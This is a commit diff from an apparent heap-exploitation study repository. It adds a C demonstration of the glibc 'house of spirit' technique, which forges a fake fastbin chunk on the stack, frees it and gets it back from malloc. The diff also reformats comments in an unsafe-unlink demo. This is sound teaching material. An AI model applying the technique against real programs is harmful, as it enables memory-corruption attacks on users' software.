finish 3.3.5; add 3.3.6

src/Others/3.3.5_heap_exploit/house_of_spirit.c

@@ -0,0 +1,30 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+int main() {
+    malloc(1);
+
+    fprintf(stderr, "We will overwrite a pointer to point to a fake 'fastbin' region. This region contains two chunks.\n");
+    unsigned long long *a, *b;
+    unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));
+
+    fprintf(stderr, "The first one:  %p\n", &fake_chunks[0]);
+    fprintf(stderr, "The second one: %p\n", &fake_chunks[4]);
+
+    fake_chunks[1] = 0x20; // the size
+    fake_chunks[5] = 0x1234; // nextsize
+
+    fake_chunks[2] = 0x4141414141414141LL;
+    fake_chunks[6] = 0x4141414141414141LL;
+
+    fprintf(stderr, "Overwritting our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[0]);
+    a = &fake_chunks[2];
+
+    fprintf(stderr, "Freeing the overwritten pointer.\n");
+    free(a);
+
+    fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[0], &fake_chunks[2]);
+    b = malloc(0x10);
+    fprintf(stderr, "malloc(0x10): %p\n", b);
+    b[0] = 0x4242424242424242LL;
+}

src/Others/3.3.5_heap_exploit/unsafe_unlink.c

@@ -30,11 +30,11 @@ int main() {
     // int *a[10];
     // int i;
     // for (i = 0; i < 7; i++) {
-	// 	a[i] = malloc(0x80);
-	// }
-	// for (i = 0; i < 7; i++) {
-	// 	free(a[i]);
-	// }
+    // 	a[i] = malloc(0x80);
+    // }
+    // for (i = 0; i < 7; i++) {
+    // 	free(a[i]);
+    // }
     free(chunk1_ptr);
 
     char victim_string[9];